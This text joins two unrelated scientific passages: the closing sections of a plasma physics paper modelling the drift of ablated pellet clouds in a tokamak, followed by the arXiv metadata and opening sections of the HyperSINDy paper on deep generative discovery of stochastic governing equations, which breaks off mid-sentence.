has started to cross the local field lines1. He concluded that the drift displacement is likely to be substantial compared to the plasma minor radius for pure hydrogen pellets, but will be strongly reduced in the presence of even a small amount of neon. Here, we attempt to reproduce this result in the corresponding limit, and then extend it by calculating the drift displacement after a long time, including the effect of ohmic currents. Figure 3 shows the drift displacement for cold clouds (30eV for pure hydrogen, 5eV otherwise). This is calculated by integrating (A 2) (leading to (A 3) if we integrate up to infinity), as a function of the background plasma temperature and pellet composition, with different integration times and assumptions regarding the ohmic currents. In panel a) we consider the case when the ablation flow has just started to cross the local field lines, i.e. with the parallel current consisting only of the Alfven current, and panel b) shows the results for long after the ablation flow started to cross the local field lines, i.e. with the parallel current being purely ohmic. The dashed lines in panel a) are calculated with the assumption that the parallel current is purely Alfvenic, as was assumed by Matsuyama (2022), and the results are similar to those shown in figure 11 in Matsuyama (2022) within an order unity factor, especially at high background plasma temperatures. The variation with both the background temperature and pellet composition agrees reasonably well. We see, however, that when we extend the integration time to infinity (solid lines), the drift displacement increases significantly at high background plasma temperatures, so that even clouds with 100% neon would drift several meters in the absence of ohmic currents, although the drift displacement is not strongly affected for temperatures \(\lesssim 1\) keV. This can be understood by considering that the pressure equilibration time becomes longer at high background plasma temperatures (see equation (10)), so that the cloud can drift a significant distance after the first \(130\,\mu\)s. Moreover, in the absence of ohmic currents, the acceleration time scale is typically longer than \(130\,\mu\)s, so that the cloud continues to gain speed even after this time frame. For low background plasma temperatures, on the other hand, the pressure equilibration time becomes shorter than \(130\,\mu\)s so the cloud does not drift significantly after this time. In panel b), where the parallel current is purely ohmic, we see that the drift displacement is reduced by about one order of magnitude when integrating up to \(130\,\mu\)s (compare with panel a), and about two orders of magnitude when integrating to infinity. The scaling with the background plasma temperature is also weaker, as anticipated above, because the resistivity determining the parallel current now scales with the background Figure 3: Drift displacement as a function of background plasma temperature and pellet composition for cold clouds (30eV for pure hydrogen, 5eV otherwise), with different integration times and assumptions for the parallel current. In panel a) the parallel current is assumed to be purely Alfvenic (corresponding to when the ablation flow has just started to cross the local field lines), and in panel b) the parallel current is assumed to be purely ohmic (corresponding to long after the ablation flow started to cross the local field lines). The solid lines correspond to performing the time integral of the drift velocity to \(t=\infty\), as in (32), the dashed lines are obtained by integrating only to \(130\,\mu\)s. plasma temperature as \(R_{\rm eff}\sim T_{\rm bg}^{-3/2}\), which mostly cancels the temperature scaling of the ablation rate \(\mathcal{G}\sim T_{\rm bg}^{5/3}\) (there is some dependence on the background temperature left at lower background temperatures where the ratio of the cloud pressure and the background pressure is lower). Moreover, the effect of increasing the integration time beyond \(130\,\mu\)s is now much smaller than in the absence of ohmic currents. This follows as the acceleration time scale \(t_{\rm acc}\) is much shorter, so that the cloud decelerates rather than accelerates after the first \(130\,\mu\)s. For neon-doped pellets, the drift displacement now ranges from a few cm up to \(\sim 20\) cm at the highest relevant temperatures, which is small compared to both the plasma minor radius and the plume of shards in case of a shattered pellet injection (SPI) in an ITER-like scenario. The pure deuterium pellets, on the other hand, still have a drift displacement of tens of cm, which is a sizeable fraction of the plasma minor radius and comparable to the radial extent of the shard plume in case of an SPI. This result corroborates the conclusion made by Matsuyama (2022). We now compare the results for the same plasma scenario as above using the expressions obtained with different limits and model assumptions. As we have seen in section 2.1.1, for hot clouds (e.g. pure deuterium pellets), the \(N\to\infty\) limit of \(R_{\rm eff}\) can be used while we keep \(N\) finite in the expression of \(P_{A}\). For cold clouds (e.g. neon-doped pellets), in the long-time limit (as the potential reaches its quasi-stationary value), the Alfven part of the current can be neglected (\(P_{A}=0\)). In figure 4, the full solution, which contains both the \(I_{\parallel,\rm A}\) and \(I_{\parallel,\rm ohm}\) contributions obtained by numerically integrating (A.1), is shown by a black curve for a pure deuterium pellet (panel a) and a 2% neon-doped one (panel b). We also consider the cases representing the long and short-time limits, in terms of the time passed after the ablation flow first started to cross the local field lines. In the short-time limit (green long-dashed curve) \(I_{\parallel,\rm ohm}\) is neglected, and it is calculated by replacing \(R_{\rm eff}\) by \(R_{A}\) in equation (A.3). The long-time limit (blue dashed curve) physically means that \(I_{\parallel,\rm A}\) is neglected, and it is calculated using (A.3). (Note that in the case of a cold cloud with a fast magnetic field diffusion time scale compared to the drift motion, in the long-time limit, the \(I_{\parallel,\rm A}=0\) limit is expected to be accurate, as discussed at the end of Sec. 2.1.1.) In addition, we also show results calculated using the simplified expression (A.5) (red dash-dotted), that represents the high-background-temperature asymptotic behaviour of the long-time limit. We see that for both the pure deuterium and the neon-doped pellet, 4a and b, the Figure 4: Comparison of the drift displacement obtained with different limits and model assumptions, for a pellet consisting of a) 100% deuterium and b) a mixture with 98% neon and 2% deuterium. Solid black: \(I_{\parallel,\rm A}+I_{\parallel,\rm ohm}\), numerical integration of (A.1). Dashed blue: \(I_{\parallel,\rm A}=0\), using (A.3). Dash-dotted red: \(I_{\parallel,\rm A}=0\) and taking \(T_{\rm bg}\to\infty\) asymptotic behaviour, using (A.5). Long dashed green: \(I_{\parallel,\rm ohm}=0\), using (A.3), but with \(R_{\rm eff}\) replaced by \(R_{\rm A}\) long-time limit gives similar drift displacement to the general expression (compare dashed and solid), especially at high background-plasma temperatures. There is a discrepancy of \(\lesssim 50\%\) at background temperatures of \(T_{\rm bg}\sim 100\,\)eV where the ohmic conductivity is rather low, but at these temperatures the displacement, and therefore the discrepancy, remains moderate. The overall good agreement reflects that the number of connections \(N\) continuously increases with time in a hot cloud, so that the Alfven conductivity is replaced by ohmic conductivity over a short period of time compared to the total drift time. In the case of a pure deuterium pellet, 4a, we see that the high-background-temperature asymptotic form of the long-time limit (dash-dotted) approaches the more accurate expression (A.3) at \(T_{\rm bg}\gtrsim 1\,\)keV, but the approach is much slower in the doped-pellet case, 4b. This difference is due to the higher cloud temperature for a pure deuterium cloud, leading to a longer pressure equilibration time \(t_{\rm pe}\) while the acceleration time \(t_{\rm acc}\) remains only weakly affected by the background temperature, making the approximation \(t_{\rm acc}/t_{\rm pe}\approx 0\) accurate at lower temperatures. Finally, we find that the short-time limit (long-dashed curves in 4) typically gives unphysically large drift displacements, unlike the general expression and the long-time limit. Only at \(T_{\rm bg}\lesssim 100\,\)eV does the short-time-limit expression become comparable to or smaller than the long-time limit; then the ohmic conductivity of the background plasma becomes so low that the Alfven conductivity starts to dominate. We note that at sufficiently low values of \(T_{\rm bg}\), the short-time limit result starts to asymptotically approach the general expression (black curve), but that happens at very small, inconsequential, values of the drift displacement \(\Delta r\). ## 4 Discussion and Conclusion We have derived a semi-analytical model for the cross-field drift of an ionised cloud following a pellet injection in a tokamak. The model gives the radial drift velocity in terms of the background plasma and cloud properties, assuming the latter to be constant along the field lines inside the cloud. The main phenomena included in the model are the \(\nabla B\) current causing the charge separation inside the cloud and the resulting \(E\times B\) drift, the rotational transform, pressure equilibration, and the currents limiting the charge separation; the latter including the polarisation current and the currents exiting through the ends of the cloud parallel to the field lines, consisting of an Alfvenic and an ohmic contribution. In particular, we have developed a statistical model for the length of the field lines connecting the two ends of the cloud, and the corresponding effective resistivity for the Ohmic current flowing along those field lines. We then derive semi-analytical expressions for the final drift displacement, combining our model for the cross-field drift with a simple analytical model for the cloud properties. We evaluate the resulting expressions in an ITER-like scenario similar to those studied by Matsuyama (2022), including a wide range of background plasma temperatures and different neon-deuterium mixtures for the pellet composition. Our results are in reasonable agreement with those obtained by Matsuyama (2022) in the corresponding limit, integrating only up to \(130\,\mu\)s after the cloud is detached from the pellet source and neglecting the ohmic part of the parallel current (corresponding to a cold cloud shortly after the pellet material has started to flow across a given field line). We then investigate the effect of adding the ohmic part of the parallel current and integrating to longer times. Without ohmic currents, the final drift displacement becomes unreasonably long, up to several tens (or even hundreds) of meters, while adding the ohmic current reduces the drift displacement by typically 1-2 orders of magnitude. Our results suggest that a pure deuterium pellet injection in an ITER-like scenario is likely to be significantly affected by the radial drift displacement, and that a substantial part of the injected material may be expelled from the plasma. On the other hand, a neon-doped pellet injection will likely be significantly less affected by the drift displacement. This result corroborates the conclusion made by Matsuyama (2022). Note, however, that even a relatively small drift displacement can have a significant effect on the ablation and density profile Vallhagen (2021). The reason is that even a small drift means that the pellet will not feel its own cooling effect on the background plasma, which otherwise provides a self-regulating feedback mechanism which decreases the ablation rate. Even a small drift therefore makes the pellet, or pellet shards, ablate faster, so that they deposit more of their material earlier along their trajectories. This applies especially to injections from the low field side, as in that case the drift will displace the ablated material behind the ablating source. On the other hand, an injection from the high field side will displace the ablated material in front of the pellet or pellet shard, so that it feels the effect of its own cooling along its trajectory In the case of an SPI in an ITER-like scenario, the plume of shards typically extends over several decimetres. Thus, in the case of a neon-doped pellet, our results indicate that the shards will still feel the cooling of the background plasma from most shards ahead of them, even for an injection from the low field side. For a pure deuterium SPI, on the other hand, the drift displacement will likely be longer than the extent of the plume of shards, which might increase the ablation significantly, especially for an injection from the low field side. A quantitative assessment of the effect of the drift displacements calculated by the model presented here would require coupling to a model for the full injection dynamics and response of the background plasma, which is outside the scope of the present work. The accuracy of the results presented in this paper is also limited by a number of simplifications, primarily in the model for the parallel expansion and cloud properties. In particular, the cloud properties are assumed to be constant along the field lines inside the cloud, and the energy balance and temperature evolution is modelled using only a constant, representative value for the cloud temperature. While the cloud temperature remains rather low and constant for a neon-doped pellet due to the high radiated power, the temperature will vary significantly during the drift motion for a pure deuterium pellet; indeed, the discrepancy compared to the results obtained by Matsuyama (2022) is larger for a pure deuterium pellet. The quantitative accuracy of the present model could therefore be significantly improved by combining the present model for the cross-field drift with a more advanced model for the cloud properties, which is outside the scope of the present work. ## Appendix A Expression for the drift displacement in relevant limits It is convenient to introduce the expansion time scale \(t_{\rm exp}=L_{c}/(2c_{s})\) and the time \(t_{\rm pol}\) it takes the cloud to expand a poloidal angle of one radian. We also introduce the normalised time variable \(t^{\prime}=t/t_{\rm acc}\) and normalise the other time scales accordingly, also denoted with a prime, and introduce the shifted normalised time variable \(t^{\prime\prime}=t^{\prime}+t_{\rm exp}/t_{\rm acc}\). In terms of these variables, the electric field inside the cloud can be expressed as \[E_{y} = E_{y0}e^{-G(t^{\prime})}+\frac{2(1+\langle Z\rangle)BTq}{\langle m_{ i}\rangle c_{s}}\times \tag{1}\] \[e^{-G(t^{\prime})}\int_{0}^{\min(t^{\prime},t^{\prime}_{\rm ps})}e ^{G(\tilde{t}^{\prime})}\left(\frac{1}{\tilde{t}^{\prime\prime}}-\frac{1}{t^{ \prime}_{\rm pe}}\right)\sin\left(\frac{\tilde{t}^{\prime\prime}}{t^{\prime}_{ \rm pol}}\right)d\tilde{t}^{\prime}\] \[= E_{y0}e^{-G(t^{\prime})}+\frac{2(1+\langle Z\rangle)BTq}{ \langle m_{i}\rangle c_{s}}\mathcal{E}\left(t^{\prime}_{\rm pe},t^{\prime}_{ \rm exp},t^{\prime}_{\rm pol},\frac{R_{\rm eff}}{R_{A}},t^{\prime}\right),\] where \(\tilde{t}^{\prime\prime}=\tilde{t}^{\prime}+t_{\rm exp}/t_{\rm acc}\) and \(\mathcal{E}\) is a dimensionless function of the time variable \(t^{\prime}\) with four dimensionless parameters. However, not all four parameters are relevant in all cases. If, for instance the ohmic currents dominate over the Alfven current (such as for a hot background plasma or for a cold cloud long after the ablation flow started to cross the local field line), we can set \(R_{\rm eff}/R_{A}=0\). In this case, \(\mathcal{E}\) can be expressed in closed form as \[\mathcal{E}\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{ \prime}_{\rm pol},0,t^{\prime}\right) \tag{2}\] \[= e^{-t^{\prime}}\left\{e^{-t_{\rm exp}}\mathfrak{E}\mathfrak{i} \left[\left(1+\frac{i}{t^{\prime}_{\rm pol}}\right)t^{\prime\prime}\right]- \frac{1}{t^{\prime}_{\rm pe}}e^{t^{\prime}}\frac{\sin\left(\frac{t^{\prime \prime}}{t^{\prime}_{\rm pol}}\right)-\frac{1}{t^{\prime}_{\rm pol}}\cos\left( \frac{t^{\prime\prime}}{t^{\prime}_{\rm pol}}\right)}{1+{t^{\prime}_{\rm pol} }^{-2}}\right\}_{0}^{\min(t^{\prime},t^{\prime}_{\rm pe})}\] \[= e^{-t^{\prime}}\left(\epsilon\left(t^{\prime}_{\rm pe},t^{ \prime}_{\rm exp},t^{\prime}_{\rm pol},\min(t^{\prime},t^{\prime}_{\rm pe}) \right)-\epsilon\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol },0)\right)\right),\] with \[\mathfrak{E}\mathfrak{i}[x]=\frac{1}{2i}\left[\mathrm{E}\mathfrak{i}(x)- \mathrm{E}\mathfrak{i}(x^{*})\right],\] where \(\mathrm{E}\mathfrak{i}\) is the exponential integral function, \(i\) is the imaginary unit, an asterisk superscript denotes complex conjugate, and we defined the expression within the curly bracket in equation (2) as \(\epsilon\). Integrating equation (2), we get the following expression for the drift displacement: \[\Delta r = \frac{E_{y0}}{B}t_{\rm acc}+\frac{2(1+\langle Z\rangle)Tq}{ \langle m_{i}\rangle c_{s}}t_{\rm acc}\int_{0}^{\infty}\mathcal{E}\left(t^{ \prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},0,t^{\prime}\right) dt^{\prime}\] \[= v_{0}t_{\rm acc}+\frac{4\bar{n}TR_{\rm eff}q}{B^{2}c_{s}}\left\{ \epsilon\left(t^{\prime}_{\rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},t ^{\prime}_{\rm pe}\right)e^{-t^{\prime}_{\rm pe}}-\epsilon\left(t^{\prime}_{ \rm pe},t^{\prime}_{\rm exp},t^{\prime}_{\rm pol},0\right)\right.\] \[\left.+e^{-t^{\prime}_{\rm exp}}\left[e^{-t^{\prime}}\left\{e^{t ^{\prime\prime}}\mathfrak{E}\mathfrak{i}\left[i\frac{t^{\prime\prime}}{t^{ \prime}_{\rm pol}}\right]-\mathfrak{E}\mathfrak{i}\left[\left(1+i\frac{1}{t^{ \prime}_{\rm pol}}\right)t^{\prime\prime}\right]\right\}\right]_{0}^{t^{\prime }_{\rm pe}}\] \[+\frac{1}{t^{\prime}_{\rm pe}}\frac{1}{1+{t^{\prime}_{\rm pol}}^ {-2}}\left[t^{\prime}_{\rm pol}\cos\left(\frac{t^{\prime\prime}}{t^{\prime}_{ \rm pol}}\right)+\sin\left(\frac{t^{\prime\prime}}{t^{\prime}_{\rm pol}} \right)\right]_{0}^{t^{\prime}_{\rm pe}}\right\},\] where \(v_{0}=E_{y0}/B\) is the speed of the pellet. In some relevant cases, \(\mathcal{E}\) can be simplified further; for high background temperatures, \(t_{\rm acc}/t_{\rm pe}\approx 0\). Moreover, the cloud length typically becomes much longer than the initial length \(L_{c}\) in a very short amount of time, so that we can approximate \(L_{c}/(c_{s}t_{\rm acc})\approx 0\). In that case, \(\mathcal{E}\) only depends on a single parameter \(t_{\rm pol}/t_{\rm acc}\), and can be expressed as \[\begin{split}\mathcal{E}\left(\infty,0,t^{\prime}_{\rm pol},0,t^{ \prime}\right)&=e^{-t^{\prime}}\left\{\mathfrak{ei}\left[\left(1+i \frac{1}{t^{\prime}_{\rm pol}}\right)t^{\prime}\right]\right\}_{0}^{t^{\prime} }\\ &=e^{-t^{\prime}}\left\{\mathfrak{ei}\left[\left(1+i\frac{1}{t^{ \prime}_{\rm pol}}\right)t^{\prime}\right]-\tan^{-1}\frac{1}{t^{\prime}_{\rm pol }}\right\}.\end{split} \tag{10}\] The corresponding expression for the drift displacement becomes \[\begin{split}\Delta r&=\frac{E_{y0}}{B}t_{\rm acc} +\frac{2(1+\langle Z\rangle)Tq}{\langle m_{i}\rangle c_{s}}t_{\rm acc}\int_{0}^ {\infty}\mathcal{E}\left(\infty,0,t^{\prime}_{\rm pol},0,t^{\prime}\right)dt ^{\prime}\\ &=v_{0}t_{\rm acc}+\frac{\pi\bar{n}TR_{\rm eff}q}{B^{2}c_{s}}. \end{split} \tag{11}\] Equations (10)-(11) apply also to a cold cloud shortly after the ablation flow has started to cross the local field line, but with \(R_{\rm eff}\) replaced with \(R_{A}\), in accordance with the corresponding change in the expression for \(t_{\rm acc}\), equation (30). Note that an increased acceleration time-scale leads to a longer drift displacement, which might seem surprising as that means that it takes longer for the cloud to get up to speed. This is however compensated by the increased inertia, preventing the cloud from slowing down when the acceleration changes sign due to the sign change of the net \(\nabla B\) current, when the sine factor in equation (24) becomes negative. ## Acknowledgements The authors are grateful to E Nardon and A Matsuyama for fruitful discussions. This work was supported by the Swedish Research Council (Dnr. 2018-03911) and part-funded by the EPSRC Energy Programme [grant number EP/W006839/1]. The work has been carried out within the framework of the EUROfusion Consortium, funded by the European Union via the Euratom Research and Training Programme (Grant Agreement No 101052200 -- EUROfusion). Views and opinions expressed are however those of the author(s) only and do not necessarily reflect those of the European Union or the European Commission. Neither the European Union nor the European Commission can be held responsible for them.
2310.04832
HyperSINDy: Deep Generative Modeling of Nonlinear Stochastic Governing Equations
The discovery of governing differential equations from data is an open frontier in machine learning. The sparse identification of nonlinear dynamics (SINDy) \citep{brunton_discovering_2016} framework enables data-driven discovery of interpretable models in the form of sparse, deterministic governing laws. Recent works have sought to adapt this approach to the stochastic setting, though these adaptations are severely hampered by the curse of dimensionality. On the other hand, Bayesian-inspired deep learning methods have achieved widespread success in high-dimensional probabilistic modeling via computationally efficient approximate inference techniques, suggesting the use of these techniques for efficient stochastic equation discovery. Here, we introduce HyperSINDy, a framework for modeling stochastic dynamics via a deep generative model of sparse governing equations whose parametric form is discovered from data. HyperSINDy employs a variational encoder to approximate the distribution of observed states and derivatives. A hypernetwork \citep{ha_hypernetworks_2016} transforms samples from this distribution into the coefficients of a differential equation whose sparse form is learned simultaneously using a trainable binary mask \citep{louizos_learning_2018}. Once trained, HyperSINDy generates stochastic dynamics via a differential equation whose coefficients are driven by a Gaussian white noise. In experiments, HyperSINDy accurately recovers ground truth stochastic governing equations, with learned stochasticity scaling to match that of the data. Finally, HyperSINDy provides uncertainty quantification that scales to high-dimensional systems. Taken together, HyperSINDy offers a promising framework for model discovery and uncertainty quantification in real-world systems, integrating sparse equation discovery methods with advances in statistical machine learning and deep generative modeling.
Mozes Jacobs, Bingni W. Brunton, Steven L. Brunton, J. Nathan Kutz, Ryan V. Raut
2023-10-07T14:41:59Z
http://arxiv.org/abs/2310.04832v1
# HyperSINDy: Deep Generative Modeling of Nonlinear Stochastic Governing Equations ###### Abstract The discovery of governing differential equations from data is an open frontier in machine learning. The _sparse identification of nonlinear dynamics_ (SINDy) (Brunton et al., 2016) framework enables data-driven discovery of interpretable models in the form of sparse, deterministic governing laws. Recent works have sought to adapt this approach to the stochastic setting, though these adaptations are severely hampered by the curse of dimensionality. On the other hand, Bayesian-inspired deep learning methods have achieved widespread success in high-dimensional probabilistic modeling via computationally efficient approximate inference techniques, suggesting the use of these techniques for efficient stochastic equation discovery. Here, we introduce _HyperSINDy_, a framework for modeling stochastic dynamics via a deep generative model of sparse governing equations whose parametric form is discovered from data. HyperSINDy employs a variational encoder to approximate the distribution of observed states and derivatives. A hypernetwork (Ha et al., 2016) transforms samples from this distribution into the coefficients of a differential equation whose sparse form is learned simultaneously using a trainable binary mask (Louizos et al., 2018). Once trained, HyperSINDy generates stochastic dynamics via a differential equation whose coefficients are driven by a Gaussian white noise. In experiments, HyperSINDy accurately recovers ground truth stochastic governing equations, with learned stochasticity scaling to match that of the data. Finally, HyperSINDy provides uncertainty quantification that scales to high-dimensional systems. Taken together, HyperSINDy offers a promising framework for model discovery and uncertainty quantification in real-world systems, integrating sparse equation discovery methods with advances in statistical machine learning and deep generative modeling. ## 1 Introduction Across numerous disciplines, large amounts of measurement data have been collected from dynamical phenomena lacking comprehensive mathematical descriptions. It is desirable to model these data in terms of governing equations involving the state variables, which typically enables insight into the physical interactions in the system. To this end, recent years have seen considerable progress in the ability to distill such governing equations from data alone (e.g., (Schmidt and Lipson, 2009; Brunton et al., 2016)). Nonetheless, this remains an outstanding challenge for systems exhibiting apparently stochastic nonlinear behavior, particularly when lacking even partial knowledge of the governing equations. Such systems thus motivate probabilistic approaches that not only reproduce the observed stochastic behavior (e.g., via generic stochastic differential equations (SDEs) (Friedrich et al., 2011) or neural networks (Girin et al., 2021; Lim and Zohren, 2021)), but do so via discovered analytical representations that are parsimonious and physically informative (Boninsega et al., 2018). We are particularly interested in model-free methods that seek to discover both the parameters and functional form of governing equations describing the data. To this end, the sparse identification of nonlinear dynamics (SINDy) framework (Brunton et al., 2016) has emerged as a powerful data-driven approach that identifies both the coefficients and terms of differential equations, given a pre-defined library of candidate functions. The effectiveness of SINDy for sparse model discovery derives from the tendency of physical systems to possess a relatively limited set of active terms. Extensions of the SINDy framework have sought to increase its robustness to noise, offer uncertainty quantification (UQ), and make it suitable for modeling stochastic dynamics (Boninsegna et al., 2018; Niven et al., 2020; Messenger and Bortz, 2021; Hirsh et al., 2021; Callaham et al., 2021; Fasel et al., 2022; Wang et al., 2022). However, these extensions have generally relied upon computationally expensive approaches to learn the appropriate probability distributions. As such, a unified and computationally tractable formulation of SINDy that meets these additional goals is presently lacking. Variational inference (VI) methods represent a class of techniques for addressing the complex and often intractable integrals arising in exact Bayesian inference, instead approximating the true posterior via simple distribution(s). Recently, the combination of _amortized_ VI (Ganguly et al., 2022) with the representational capacity of neural networks has emerged as a powerful, efficient approach to probabilistic modeling, with widespread application in the form of deep generative models (Kingma and Welling, 2014; Rezende and Mohamed, 2015). Despite the success of these approaches for dynamical modeling (e.g., (Girin et al., 2021)), applications thus far have utilized generic state space formulations or parameter inference on a known functional form of the dynamics. Thus, the potential for VI to facilitate probabilistic equation discovery remains largely unexplored. ### Contributions In this work, we propose HyperSINDy, a VI-based SINDy implementation that learns a parameterized distribution of ordinary differential equations (ODEs) sharing a common sparse form. Specifically, HyperSINDy employs a variational encoder to parameterize a latent distribution over observed states and derivatives, then uses a hypernetwork (Ha et al., 2016; Pawlowski et al., 2018) to translate samples from this distribution into the coefficients of a sparse ODE whose functional form is learned in a common optimization. In this way, HyperSINDy is able to model complex stochastic dynamics through an interpretable analytical expression - technically, a _random_ ODE (Han and Kloeden, 2017) - whose coefficients are parameterized by a white noise process. Specific contributions of the HyperSINDy framework include: * **Efficient and Accurate Modeling of Stochastic Dynamics at Scale.** Through VI, we circumvent the curse of dimensionality that hampers other methods in identifying sparse stochastic equations. Specifically, HyperSINDy can accurately discover governing equations for stochastic systems having well beyond two spatial dimensions, which existing approaches have not exceeded (Boninsegna et al., 2018; Callaham et al., 2021; Wang et al., 2022; Huang et al., 2022; Tripura and Chakraborty, 2023). Importantly, HyperSINDy's generative model is able to learn a complex distribution over the coefficients, and variance proportionately scales to match that of the data. * **Generative Modeling of Dynamics.** Once trained, HyperSINDy generates a random dynamical system whose vector field is parameterized by a Gaussian white noise. Hence, our approach efficiently arrives at a generative model for both the system dynamics and the exogenous disturbances (representing, e.g., unresolved scales). This permits simulations that reproduce the stochastic dynamical behavior of the observed process, while providing a natural method for quantifying uncertainty of the model parameters and propagating uncertainty in the probabilistic model forecast. * **Interpretable Governing Equations Discovery.** In contrast to other deep generative approaches for modeling stochastic dynamics, HyperSINDy discovers the analytical form of a sparse governing equation without a priori knowledge. Sparsity promotes human readable models where each term corresponds to an interpretable physical mechanism. This notion of interpretability, based on sparsity, is appealing in the traditional perspective of engineering and physics. In section 1.2, we discuss relevant literature. In section 2, we provide a background on the specific methods and mathematics that inspired our method. In section 3, we describe HyperSINDy. In section 4, we show results on various experiments. In section 5, we conclude with a discussion of our method, its limitations, and possible future directions. ### Related Work HyperSINDy bridges two parallel lines of work concerning data-driven modeling for stochastic dynamics: namely, probabilistic sparse equation discovery and deep generative modeling. Most probabilistic implementations of SINDy have concerned UQ and noise robustness in the deterministic setting, rather than modeling stochastic dynamics per se. Of these approaches, ensembling methods (Fasel et al., 2022) have achieved state-of-the-art UQ and noise robustness for deterministic SINDy models, and were recently shown (Gao et al., 2023) to offer a computationally efficient alternative to earlier Bayesian implementations of SINDy (Niwen et al., 2020; Hirsh et al., 2021) leveraging costly sampling routines to compute posterior distributions. Nonetheless, a model of the process noise is crucial for accurate UQ in the stochastic dynamics setting. Multiple studies have generalized the SINDy framework for the identification of parametric SDEs (Boninsegna et al., 2018; Callaham et al., 2021), with Figure 1: **HyperSINDy Framework.** HyperSINDy employs an inference model and generative model to discover an analytical representation of observed stochastic dynamics in the form of a random (nonlinear) ODE \(f_{\mathbf{z}}(x)\). The inference model is an encoder neural network that maps \((\mathbf{x},\hat{\mathbf{x}})\) to the parameters \(\mu\) and \(\sigma\) of \(q_{\phi}(\mathbf{z}|\mathbf{x},\hat{\mathbf{x}})\). \(\hat{\mathbf{z}}\) can be sampled using a simple reparameterization of \(\mu\) and \(\sigma\). The generative model predicts the derivative via a hypernetwork \(H\), which transforms \(\mathbf{z}\) into \(\Xi_{\mathbf{z}}\), the coefficients of the ODE. \(f_{\mathbf{z}}(\mathbf{x})\) comprises a function library \(\Theta\), the coefficients \(\Xi_{\mathbf{z}}\), and sparse mask \(M\). If \(\hat{\mathbf{x}}\) is not available (e.g., after training), \(\mathbf{z}\) is sampled from the prior \(\mathbf{z}\sim p_{\theta}(\mathbf{z})\) to produce \(\Xi_{\mathbf{z}}\). In the legend, trainable parameters are shown in green. The loss function comprises terms related to 1) the derivative reconstructions, 2) the latent distribution \(q_{\phi}(\mathbf{z}|\mathbf{x},\hat{\mathbf{x}})\), and 3) sparsity of the discovered equation. See accompanying pseudocode 1 and 2 for details on batch-wise training. three such studies recently performed in the Bayesian setting (Wang et al., 2022; Huang et al., 2022; Tripura and Chakraborty, 2023). However, as discussed in these works, existing methods for approximating the drift and diffusion terms of the SDE (e.g., constructing histograms for the Kramers-Moyal expansion) are severely hampered by the curse of dimensionality, with computational cost generally scaling exponentially with SDE state dimension. Thus, an efficient and scalable formulation of SINDy for stochastic dynamics remains lacking. A separate line of work has leveraged advances in probabilistic deep learning for modeling stochastic dynamics, with deep generative models achieving state-of-the-art performance across a wide range of modeling tasks (e.g., (Yoon et al., 2019; Girin et al., 2021)). Although these models do not typically involve explicit dynamical representations, the new paradigm of physics-informed machine learning (Karniadakis et al., 2021) has motivated numerous developments at this intersection (e.g., (Lopez and Atzberger, 2021; Takeishi and Kalousis, 2021; Yang et al., 2020; Zhang et al., 2019). Regarding the specific goal of (stochastic) equation discovery, several recent works have successfully employed VAEs to learn the coefficients of a generic (or pre-specified) SDE representation within a (potentially lower-dimensional) latent space(Hasan et al., 2022; Garcia et al., 2022; Nguyen et al., 2021; Zhong and Meidani, 2023). We propose to similarly leverage a VAE-like architecture to perform inference on a latent stochastic process; however, we seek to additionally discover a structural representation of the governing laws, which can yield considerable physical insight into the system (Boninsega et al., 2018; Nayek et al., 2021; Wang et al., 2022). Taken together, we seek to bridge the above fields via a unified deep learning architecture (trainable end-to-end with backpropagation) that enables discovery of the functional form of a governing stochastic process, along with posterior distributions over the discovered system coefficients (e.g., for UQ). ## 2 Background We briefly overview the SINDy and VAE frameworks, as well as an implementation of an \(L_{0}\) loss, before describing their integration within the HyperSINDy architecture. Sparse Identification of Nonlinear DynamicsThe SINDy (Brunton et al., 2016) framework leverages sparse regression to enable discovery of a parsimonious system of differential equations from time-ordered snapshots. Thus, consider a system with state \(\mathbf{x}(t)\in\mathbb{R}^{d}\) governed by the ODE: \[\mathbf{\dot{x}}(t)=f(\mathbf{x}(t)) \tag{1}\] Given \(m\) observations of the system in time \(\mathbf{X}=[\mathbf{x}(t_{1}),\mathbf{x}(t_{2}),...,\mathbf{x}(t_{m})]^{T}\) and the estimated time derivatives \(\mathbf{\dot{X}}=[\mathbf{\dot{x}}(t_{1}),\mathbf{\dot{x}}(t_{2}),...,\mathbf{ \dot{x}}(t_{m})]^{T}\), we construct a library of candidate functions \(\Theta(\mathbf{X})=[\theta_{1}(\mathbf{X}),\theta_{2}(\mathbf{X}),...,\theta _{t}(\mathbf{X})]\). We then solve the regression problem, \(\mathbf{\dot{X}}=\Theta(\mathbf{X})\mathbf{\Xi}\), to identify the optimal functions and coefficients in \(\Theta\) and \(\mathbf{\Xi}\), respectively. A sparsity-promoting regularization function \(R\) is typically added to this model discovery problem, yielding the final optimization, \(\mathbf{\dot{\Xi}}=\arg\min_{\mathbf{\Xi}}(\mathbf{\dot{X}}-\Theta(\mathbf{X })\mathbf{\Xi})^{2}+R(\mathbf{\Xi})\). Although we focus on this basic implementation, we note that there have been numerous extensions of the original SINDy framework (for a recent overview, see (Kaptanoglu et al., 2022)), many of which can be easily incorporated into the present framework. Variational AutoencoderThe VAE framework (Kingma and Welling, 2014) elegantly integrates variational inference (VI) with deep learning architectures, providing an efficient and powerful approach toward probabilistic modeling. VAEs assume that a set of observations \(\mathbf{x}\) derives from a corresponding set of latent states \(\mathbf{z}\). VAEs construct an approximate posterior distribution \(q_{\phi}(\mathbf{z}|\mathbf{x})\) and maximize the evidence lower bound (ELBO) of the log likelihood of the data \(p_{\theta}(\mathbf{x})\): \[\log p_{\theta}(\mathbf{x})\geq ELBO(\mathbf{x},\mathbf{z})=\mathbb{E}_{q_{ \phi}(\mathbf{z}|\mathbf{x})}[\log p_{\theta}(\mathbf{x}|\mathbf{z})]-D_{KL}(q _{\phi}(\mathbf{z}|\mathbf{x})||p_{\theta}(\mathbf{z})) \tag{2}\] where \(\phi\) and \(\theta\) and are the parameters of the inference (encoder) and generative (decoder) models, respectively. The "reparameterization trick" enables sampling from \(q_{\phi}(\mathbf{z}|\mathbf{x})\) using \(\mathbf{z}=\mu(\mathbf{z})+\sigma(\mathbf{z})\odot\epsilon\) while still training the network end-to-end with backpropagation. After training, new observations are easily generated by sampling from the prior \(p_{\theta}(\mathbf{z})\), typically a unit Gaussian with diagonal covariance. \(L_{0}\) RegularizationThe \(L_{0}\) norm is ideal for sparse regression problems as it penalizes all nonzero weights equally, regardless of magnitude. As \(L_{0}\) regularization poses an intractable optimization 